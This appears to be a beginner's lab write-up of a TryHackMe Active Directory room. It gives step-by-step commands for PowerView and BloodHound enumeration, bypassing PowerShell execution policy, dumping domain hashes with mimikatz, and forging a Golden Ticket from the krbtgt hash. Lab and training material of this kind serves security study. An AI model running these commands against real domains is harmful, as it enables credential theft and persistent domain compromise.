#mimikatz #bloodhound #powerview #Goldentickets
Part 1: https://medium.com/@navkang/active-directory-enumeration-and-exploitation-for-beginners-604a32f45011
Part 2: https://medium.com/@navkang/attacking-kerberos-e2b1be3dbbe9
This is a follow up write up from Active Directory enumeration and attacks for beginners. Credit to TryHackMe for a fantastic learning room.
Contents
- Enumeration with Powerview
- Enumeration with BloodHound
- Dumping hashes with Mimikatz
- Golden Tickets with Mimikatz
1. Enumeration with Powerview
powershell -ep bypass
- this allows easy bypassing of powershell execution policies
Start powerview:
. .\Downloads\PowerView.ps1
Enumerate domain users:
Get-NetUser | select cn
Enumerate domain groups:
Get-NetGroup -GroupName *admin*
Shared Folders:
Invoke-ShareFinder
For more commands: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
2. Enumeration with BloodHound
- used with Sharphound (when on Windows) and BloodHound.py (on Linux)
powershell -ep bypass
. .\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
Transfer file to kali machine — as we are using ssh we can use scp to transfer
Start bloodhound on your attacking system and sign in to the portal
Upload the zip file and once uploaded click on “queries”
3. Dump hashes with Mimikatz
.\mimikatz.exe
privilege::debug
lsadump::lsa /patch
Crack the hashes with JtR or Hashcat
4. Golden Tickets with Mimikatz
Dump the krbtgt Hash
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
Create a Golden Ticket
kerberos::golden /user: /domain: /sid: /krbtgt: /id:
Use the Golden Ticket to access other machine
misc::cmd
- this will provide you with another command prompt